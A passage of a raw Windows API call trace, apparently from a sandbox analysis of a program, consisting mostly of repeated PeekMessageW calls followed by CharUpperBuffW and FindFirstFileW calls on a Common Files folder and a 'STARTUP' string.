lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.517] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.518] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.519] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.520] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.521] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.522] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.523] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.561] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.608] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.622] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.653] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.685] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.702] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.746] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.795] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.809] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.840] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.871] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.887] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.906] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.934] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.981] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0156.012] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0156.027] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0156.058] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0156.074] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0156.121] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0156.153] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x87f800 | out: lpFindFileData=0x87f800*(dwFileAttributes=0xa, ftCreationTime.dwLowDateTime=0x7e8b71, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x7738e36c, ftLastAccessTime.dwHighDateTime=0x7738e0d2, ftLastWriteTime.dwLowDateTime=0x9b9a78, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x8a0000, dwReserved1=0x9bf2d8, cFileName="㧞", cAlternateFileName="")) returned 0xffffffff [0156.153] CharUpperBuffW (in: lpsz="STARTUP", cchLength=0x7 | out: lpsz="STARTUP") returned 0x7 [0156.153] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x87f5a8 | out: lpFindFileData=0x87f5a8*(dwFileAttributes=0xa, ftCreationTime.dwLowDateTime=0x7e8b71, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x7738e36c, ftLastAccessTime.dwHighDateTime=0x7738e0d2, 